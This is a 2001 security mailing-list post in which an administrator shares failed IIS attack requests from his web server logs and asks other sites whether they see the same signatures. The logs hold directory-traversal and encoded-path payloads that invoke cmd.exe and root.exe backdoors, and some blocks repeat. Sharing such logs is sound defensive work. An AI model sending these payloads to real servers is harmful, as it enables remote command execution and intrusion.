Folks,
Someone mentioned earlier today that they were seeing signatures in their logs
similar to the ones we are now seeing at a dramatic rate within a short time span.
Are other sites seeing similar signatures (quick greps attached and
posted below)? Has a new toy been unleashed, or is this an old toy whose
signature we have not seen before? Every request below was answered with
404 or 400, so none of them succeeded here:
208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
Thanks,
Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
208.1.206.226 - - [18/Sep/2001:11:35:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.1.206.226 - - [18/Sep/2001:11:35:56 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.1.206.226 - - [18/Sep/2001:11:35:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.206.226 - - [18/Sep/2001:11:35:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.206.226 - - [18/Sep/2001:11:36:00 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.206.226 - - [18/Sep/2001:11:36:00 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.206.226 - - [18/Sep/2001:11:36:01 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.206.226 - - [18/Sep/2001:11:36:02 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.1.206.226 - - [18/Sep/2001:11:36:03 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:10 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:11 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:12 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.206.226 - - [18/Sep/2001:11:36:16 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.206.226 - - [18/Sep/2001:11:36:26 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.206.226 - - [18/Sep/2001:11:36:27 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.206.226 - - [18/Sep/2001:11:36:28 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.33.26.44 - - [18/Sep/2001:11:28:52 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.33.26.44 - - [18/Sep/2001:11:28:52 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.33.26.44 - - [18/Sep/2001:11:28:56 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.33.26.44 - - [18/Sep/2001:11:28:57 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.33.26.44 - - [18/Sep/2001:11:28:58 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.33.26.44 - - [18/Sep/2001:11:28:59 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.33.26.44 - - [18/Sep/2001:11:28:59 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.33.26.44 - - [18/Sep/2001:11:29:00 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.33.26.44 - - [18/Sep/2001:11:29:01 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:02 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:02 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:03 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.33.26.44 - - [18/Sep/2001:11:29:04 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.33.26.44 - - [18/Sep/2001:11:29:05 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.33.26.44 - - [18/Sep/2001:11:29:06 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.33.26.44 - - [18/Sep/2001:11:29:06 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 210
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 208
208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 218
208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
249
208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265
208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232